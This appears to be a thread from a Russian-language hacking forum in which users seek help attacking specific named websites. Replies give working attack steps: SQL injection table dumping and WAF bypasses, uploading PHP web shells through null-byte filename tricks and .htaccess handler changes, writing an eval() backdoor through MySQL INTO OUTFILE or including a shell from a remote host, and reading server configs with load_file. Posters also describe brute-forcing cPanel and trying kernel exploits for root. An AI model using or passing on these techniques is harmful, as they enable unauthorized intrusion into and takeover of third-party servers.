Вот, не так давно выкладывал скрипт, дампит таблицы через limit в ошибке (MySQL 4.1>=) https://forum.antichat.ru/showthread.php?p=2352621#post2352621 Заточить под себя не сложно.
всем привет у менеа ести маленкая проблема, саит такои _quanttest.ro, ести доступ к cpanel и через ftp, тут все панятно, но у саита ести 2-я части, если залогинится пасылают вас на саит >>> network.quanttest.ro, из cpanel доступa к нему нету (из ошиблки видно што он находитця в другой директорие на серваке /home/fnet а другои в папке /home/qt) мне к нему надобы подобратсеа. sql ести но запрос я подобрати не как не магу. отпешитеси y каво какие идеи ести. еа писал на форуме но, ребеата вличку не отзиваиутсеа, админи стеорли мои пост... , наверное сылаияси на то что я занимаиуси смапамам или из за отсуствие постов. PS shh не фурычит, залил phpshell, начил искати подход к root, exploit на linux 2.6.18, apache 2.2.16 но безрезультатно. PSS на даном моменте работает брут на для спанел на базе perl, но результат мало вероятнии пароли 13-и значние, всеотаки админ не полнии ламер
Народ, помогите с http://parus-grad.com.ua/SearchResult.html?ot=(select+test) плиз. Как добраться до списка таблиц?
Вообщем получилось залить шелл вот так shell.php.jpg Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O --------- https://www.enzymedica.com/images/products/39_win4.php.gif https://www.enzymedica.com/images/products/39_win4.php.swf https://www.enzymedica.com/images/products/39_win2.php%2500.jpg help
а ты чего ожидал? у тебя конечный формат-картинка такое прокатит очень редко, если хтаксесс настроенo неправильно
Ищи инклуд и инклудь шелл. Пытайся залить свой .htaccess и пропиши исполнение jpg файлов (AddHandler application/x-httpd-php .jpg) Если файл проходит через функцию copy(), при заливке прокатит нулл байт (shell.php%00.jpg), расширение обрежется и ты получишь полноценный шелл. П.С. Ты будешь теперь каждое действие спрашивать? Проще было написать, я ничего не знаю, дайте мне ссылку на залитый шелл.
что за шляпа???шелл литься не хочет p.s какие есть способы залития шелла в phpmyadmin????? и что можно сделать имея доступ в phpmyadmin?
CREATE DATABASE `shell_upload`; CREATE TABLE `hack` (`shell` TEXT); INSERT INTO `hack` (`shell`) VALUES ('<?php eval($_GET[c]); ?>'); Ищем папку с правами на запись и делаем запрос SELECT `shell` FROM `hack` INTO OUTFILE '/path/shell.php'; Либо можно инклудить шелл с сервера. INSERT INTO `hack` (`shell`) VALUES ("<?php include('http://сайт с шеллом'); ?>"); Для этого способа, директива allow_url_include должна находиться в положении On.
вроде залил , но теперь хз где искать сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("<?php include('http://сайт с шеллом'); ?>"); где теперь найти на сайте этот шелл(
Когда льешь через into outfile, ты должен указать абсолютный путь до папки с правами на запись, там и ищи. Лучше лей через eval, так как allow_url_include, достаточно редко бывает в положении On.
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так? я просто хз как найти папку для залива файлов шел во 2й раз заливаю
Ну я не знаю какой у тебя путь, это тебе виднее. Если ты это прописал рандомом, то вероятно не так. А если ты прочитал конфиги через load_file или нашел раскрытие путей, то так. У тебя вообще права есть на чтение и запись файлов? Что то я уже начал сомневаться, судя по ошибке, что ты выложил, а потом удалил. Сделай запрос в phpmyadmin HTML: SELECT user() FROM mysql.user выдаст тебе юзера, под которым работает БД Потом сделай запрос HTML: SELECT file_priv FROM mysql.user WHERE user = 'имя юзера' Если получишь Y, значит права есть. Следовательно, ты можешь читать файлы через load_file() и писать в них, дальше попробуй прочитать конфиги сервера. HTML: SELECT load_file('/etc/apache2/httpd.conf') и тд, там ты найдешь путь. Стандартные пути для файлов конфигурации, ты можешь найти по ссылке https://forum.antichat.ru/thread49775-Default.html Либо ищи раскрытие путей. Некоторые варианты, как это можно сделать описаны мной вот тут https://forum.antichat.ru/showpost.php?p=2324984&postcount=4 Какая вообще твоя цель? Шелл залить? Ты можешь достать из базы акк админа и попробывать залить через админку. Как это сделать обсуждалось выше.
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает. union(SELECT+1,table_name,3,4,5)from(iNformation_schema.tabl%00es) Вот так не работает. union(SELECT+1,version(),3,4,5) так работает. Посоветуйте что-либо плиз. Спасибо.
